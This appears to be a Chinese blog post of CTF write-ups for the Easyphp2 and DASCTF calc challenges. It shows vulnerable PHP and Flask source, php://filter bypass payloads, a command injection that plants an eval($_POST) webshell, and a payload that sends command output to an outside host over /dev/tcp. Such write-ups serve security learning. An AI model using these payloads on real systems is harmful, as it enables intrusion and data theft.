BUUCTC(33)

XINO
231 阅读1分钟

本文已参与「新人创作礼」活动,一起开启掘金创作之路。

[羊城杯 2020]Easyphp2

convert.quoted-printable-encode & convert.quoted-printable-decode

这里使用的是两次url编码绕过

/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php
/?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php

其他方法

?file=php://filter/read=convert.iconv.utf-8.utf-16be/resource=GWHT.php
/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php

 

源码

 <?php
    if (isset($_GET["count"])) {
        $count = $_GET["count"];
        if(preg_match('/;|base64|rot13|base32|base16|<?php|#/i', $count)){
        	die('hacker!');
        }
        echo "<h2>The Count is: " . exec('printf '' . $count . '' | wc -c') . "</h2>";
    }
    ?>

 

通过dirsearch可以扫描到robots.txt,访问后得到提示Disallow: /?file=check.php

通过抓包可以发现这里有一个pass,将pass值改为GWHT

题目已经将<?php进行过滤

<?= eval($_POST['xino'])?>
?file=GWHT.php&count='|echo "<?= eval($_POST['wind'])?>" > a.php||'

GWHT文件下README一串hash加密

解密得到GWHTCTF

最后终端

shell=system("printf 'GWHTCTF' | su GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'");

2022DASCTF X SU 三月春季挑战赛calc

给了源码

app=Flask(__name__)
def waf(s):
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag
    
@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")
@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"


    
if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)

简单看一下,黑名单过滤关键字符,括号都被过滤了,本想试着命令执行,看来行不通,何况过滤了这么多

思路:传系统命令到log,利用os.system去执行

需要注意将num后用#去注释

payload

1#`ls`

之后外带/tmp/log.txt数据即可

另一种方法,思路:

1.三个单引号闭合起来的地方会当作字符串处理

2.单引号闭合过滤后面内容

3.#过滤

payload

'''2'
ls> /dev/tcp/x.x.x.x/port
#'3'''> ./tmp/log.txt

换行因为过滤了空格,用换行符绕过

avatar
文章
阅读
粉丝